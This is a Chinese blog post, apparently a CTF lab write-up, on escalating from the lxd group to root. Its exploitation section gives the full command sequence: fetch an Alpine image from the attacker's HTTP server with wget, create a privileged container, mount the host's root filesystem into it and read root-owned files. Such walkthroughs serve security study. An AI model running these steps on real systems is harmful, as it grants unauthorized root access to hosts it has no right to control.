linux lxd组用户提权至root

已于 2022-03-17 15:21:43 修改
阅读量4.5k 收藏 4
点赞数 3
分类专栏: 提权 文章标签: linux 安全 web安全
于 2022-03-17 15:13:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/123548739
版权

1. 漏洞介绍

通过适当的操作,本地lxd组的用户成员可以理解将自己的权限提升为主机操作系统的root权限。这种特性与该用户是否已被授权sudo权限无关,而且全程也无需用户输入密码。研究人员表示,LXD SNAP包中甚至也存在这样的漏洞。

LXD是一个root进程,它可以负责执行任意用户的LXD UNIX套接字写入访问操作。而且在某些情况下,LXD甚至都不会对调用它的用户权限进行检查和匹配,现在社区也有很多种方法可以利用LXD的这种特性来实施攻击。

其中的一项技术就是使用LXD API来将目标主机的根文件系统加载进一个容器中,而本文讨论的也是这项技术。一旦成功,攻击者就可以将低权限的用户提升为root权限,并且能够在不受任何限制的情况下访问目标系统的各种数据资源。

=总之原理就是=
=就是用用户创建一个容器,再用容器挂载宿主机的磁盘,然后用容器的权限去操作宿主机磁盘内容从而达到提权=

2. LXD和LXC

Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源。

Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的,而这种技术之前Docker也使用过。LXD使用了稳定的LXC API来完成所有的后台容器管理工作,并且增加了REST API支持,更进一步地提升了用户体验度。

3. 提权实战

3.1 环境介绍

靶机 192.168.56.119 hacksudo3 靶机 =不出网=
攻击机 kali 192.168.56.137

3.2 漏洞利用前提

3.2.1 id 查看用户所属组

在这里插入图片描述
可以看到 所属组有lxd组

3.2.2 which lxd lxc

查看靶机lxd,lxc两个二进制文件是否存在
在这里插入图片描述
存在

3.2.3 攻击机操作

  1. 通过git将构建好的alpine镜像克隆至本地;

    git clone https://github.com/saghul/lxd-alpine-builder.git

  2. 执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

    cd lxd-alpine-builder   
sudo ./build-alpine

    在这里插入图片描述
    在这里插入图片描述

  3. 将tar文件发送至目标设备;

    下载好后 启动python http访问

    python3 -m http.server 80

3.2.4 靶机操作

靶机操作:

  1. 下载攻击机上的alpine-v3.15-x86_64-20220124_1022.tar.gz

    wget http://192.168.56.137/alpine-v3.15-x86_64-20220317_1435.tar.gz

  2. 导入镜像并初始化镜像

    lxc image import ./alpine-v3.15-x86_64-20220317_1435.tar.gz --alias test
lxc init test test -c security.privileged=true

    在这里插入图片描述
    报错了 说没有初始化

    lxd init    一路回车

    在这里插入图片描述

    lxc init test test -c security.privileged=true 初始化镜像

在这里插入图片描述

  1. 挂载磁盘

    lxc config device add test test disk source=/ path=/mnt/root recursive=true

    在这里插入图片描述

  2. 启动镜像并进入镜像访问任意文件

    lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls
cd /root
cat proof.txt
cat root.txt

在这里插入图片描述

LuckyCharm~
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Practical LXC and LXD Linux Containers for Virtualization and 无水印pdf
09-27
Practical LXC and LXD Linux Containers for Virtualization and Orchestration 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn...
在 CentOS 8 上使用 LXC / LXD 运行 Linux 容器
allway2的博客
01-03 3217
揭秘 LXC Linux 容器项目 (LXC) 是一个开源容器平台,提供了一工具、模板、库和语言绑定。它提供的容器包括一个完整的 Linux 系统,就像一个 VM,有自己的文件系统、网络和多个应用程序。LXC 有一个简单的命令行界面,可以改善启动容器时的用户体验(RedHat,2020)。通过强大的 API 和简单的工具,它使 Linux 用户能够轻松创建和管理系统或应用程序容器。在容器化之前,Docker 是建立在 LXC 之上的,但从那时起,它们已经转向容器化。 LXC 的特点 当前的 LXC
虚拟容器LXD命令详解
weixin_45266856的博客
02-17 1841
LXD是一个系统级的容器,类似于虚拟机或物理机,它是对LXC的基础打包和升级,可在内部运行完整的操作系统,支持运行各类型的工作负载,用户可以像管理虚拟机或物理机一样来管理LXD。系统容器通常是持久的,用户可在一个系统容器中托管多个应用程序。
2024年Linux最全系统容器LXD:容器技术的革命
最新发布
2301_76328475的博客
04-30 296
LXD作为一种创新的容器解决方案,其类虚拟机的隔离性、易于管理的特点以及卓越的性能,使其在云计算和微服务架构中具有广泛的应用前景。随着技术的不断发展和完善,LXD有望成为未来容器技术领域的一个重要里程碑。在我们这个不断追求高效、安全和可扩展性解决方案的时代,LXD无疑是向前迈出的一大步。对于正在追求技术进步的我们来说,深入理解和掌握LXD等先进技术,将使我们能够更好地设计和实现复杂的系统解决方案,为企业和团队带来更大的价值。
linux中id命令的使用,Linux中的id命令:5个实用示例
weixin_34174789的博客
04-29 1258
Linux中的ID命令用于显示用户的真实有效的用户ID和ID。在本教程中,我将向你展示如何使用Linux中的id命令和一些最常见和有用的示例。在linux中,使用id命令这是id命令的语法:id [options] [username]如果不提供用户名,这个命令将显示有关当前登录用户的详细信息。id这是Ubuntu Linux中显示的输出。[email protected]:~$ iduid=1...
20.Linux显示用户的GID和UID
MrWangHao的博客
06-21 2333
其中的数字部分是每个用户的 GID,括号内是用户的名字。表示该用户账户的 UID(User Identifier)为 1000,UID 是一个数字标识符,用于在 Linux 系统中唯一标识每个用户账户。表示该用户账户的 GID(Group Identifier)为 1000,GID 是一个数字标识符,用于在 Linux 系统中唯一标识每个用户。总的来说,以上信息描述了该用户账户的基本身份信息和所属的用户列表。要在Linux中显示用户的GID(Group ID)和UID(User ID),可以使用。
多人共用GPU服务器LXD安装
Ghlerrix的博客
10-26 1952
LXD安装教程
crystalxdLXD REST API的Crystal客户端
02-04
crystalxdLXD REST API的Crystal客户端
LXD-UI:LXD用户界面,由electron-vue提供支持
02-04
用户界面 用于本地LXD服务器的简单易用的GUI。 没有依赖! 只需运行自包含的AppImage! 您必须使用> = LXD 2.17 特征: 创建,编辑,启动,重新启动,停止,冻结,解冻和快照容器。 从任何已定义的LXD远程服务器上的...
Practical LXC and LXD: Linux Containers for Virtualization and Orchestration
09-05
Practical LXC and LXD begins by introducing you to Linux containers (LXC and LXD). You will then go through use cases based on LXC and LXD. Next, you will see the internal workings of LXC and LXD by ...
lxd-dashboard:该LXD仪表板是一个Web用户界面,用于管理基于LXD的容器和虚拟机
05-06
LXD仪表板是基于Web用户界面,允许用户轻松管理LXD / LXC服务器。 一些功能包括: 连接和管理多个LXD服务器 通过表单或JSON输入创建LXD容器和虚拟机实例 启动,停止,重命名和删除LXD实例 复制实例以创建新实例...
关于Linux环境下的LXD及Docker提权
qq_46081990的博客
03-22 1651
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。LXD主要面向系统级容器,可以运行完整的操作系统镜像,并提供类似于虚拟机的环境。上述提权方案只是对宿主机目录有了操作权限,如果此时反弹 shell 得到的权限将是容器内的 root 权限,而非宿主机的 root 权限,显然不是我们想要的。拉取镜像,创建容器,将宿主机的根目录 "/" 挂载到容器中的 "/mnt" 目录,进入 /mnt/root 目录查看便可得到 flag`
Ubuntu 18.04 lxdlxd-client导致版本过低无法apt安装
运维密码
09-04 1058
导致原因:升级apt install upgrade导致lxd-client版本被拉低到1:0.8导致无法安装lxd版本1:0.8,如下图,正常情况lxd-client和lxd版本是一样的。非必要情况下不建议去升级。 检查lxdlxd-client版本 dpkg -l | grep lxd 顺带讲下Linux中update和upgrade有何区别? update update 是...
Linux上的多系统管理工具--LXD
ghost0zxc的博客
01-31 5931
文章目录1 LXD简介1.1 容器技术1.2 LXC与Docker2 镜像(image)2.1 镜像2.2 指令3 容器(container)3.1 容器与快照3.2 常用指令4 存储(storage)(可选)文件管理ZFS5 配置端口GPU与CUDA(留坑)参考与工具 1 LXD简介 1.1 容器技术 使用 Linux 容器而不是硬件虚拟化向用户提供一种接近虚拟机的使用体验。 1.2 LXC与Docker LXD是LXC的升级,更加易用以及方便主机间的通信。 LXD更注重系统容器,即运行一个完整的Lin
系统容器LXD:容器技术的革命
十年运维开发经验的王义杰在此分享自己的知识和经验
03-09 422
LXD作为一种创新的容器解决方案,其类虚拟机的隔离性、易于管理的特点以及卓越的性能,使其在云计算和微服务架构中具有广泛的应用前景。随着技术的不断发展和完善,LXD有望成为未来容器技术领域的一个重要里程碑。在我们这个不断追求高效、安全和可扩展性解决方案的时代,LXD无疑是向前迈出的一大步。对于正在追求技术进步的我们来说,深入理解和掌握LXD等先进技术,将使我们能够更好地设计和实现复杂的系统解决方案,为企业和团队带来更大的价值。
LXD虚拟容器及常用命令
计算机视觉算法开发与落地
02-03 1517
lxc服务器配置手册及使用
ubuntu服务器LXD配置
tengxiang的博客
12-04 2534
1. 安装lxd sudo apt-get install lxd 2. 将普通用户添加至lxd,使普通用户也可使用lxd # 添加用户,并加入lxd用户(user1为新用户名) useradd -md /home/user1 -s /bin/bash -g lxd user1 # 设置新用户的密码 passwd user1 # 切换到新用户 su - user1 3. 初始化l...
LXD 2.0 系列(一):LXD 入门
Free雅轩的博客
11-27 2775
当构建最终容器配置时(即通常的扩展配置),这些配置文件都会按照他们定义顺序被应用到容器上,当有重名的配置键或设备时,新的会覆盖掉旧的。相对的, Docker 关注于短期的、无状态的、最小化的容器,这些容器通常并不会升级或者重新配置,而是作为一个整体被替换掉。值得注意的是,因为我们允许用户保存容器的运行时状态,这就有效的为我们提供了“有状态”的快照的功能。LXD 是基于镜像实现的,所有的 LXD 容器都是来自于镜像。LXC 成功的实现了它的目标,它提供了一系列很棒的用于创建和管理容器的底层工具和库。
linux lxd提供了哪些命令
05-10
Linux LXD 是一个轻量级的虚拟化解决方案,它提供了一些方便的命令来管理容器。以下是一些常用的命令: 1. lxc launch - 启动一个新的容器实例 2. lxc list - 列出所有正在运行的容器 3. lxc info - 显示关于 LXD 守护进程的信息 4. lxc stop - 停止一个容器 5. lxc delete - 删除一个容器 6. lxc exec - 在容器中执行命令 7. lxc publish - 将容器发布为一个镜像 8. lxc image list - 列出所有可用的镜像 9. lxc network list - 列出所有可用的网络 10. lxc config - 管理容器的配置信息 以上是一些常用的LXD命令,可以通过man lxc命令来了解更多详细用法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值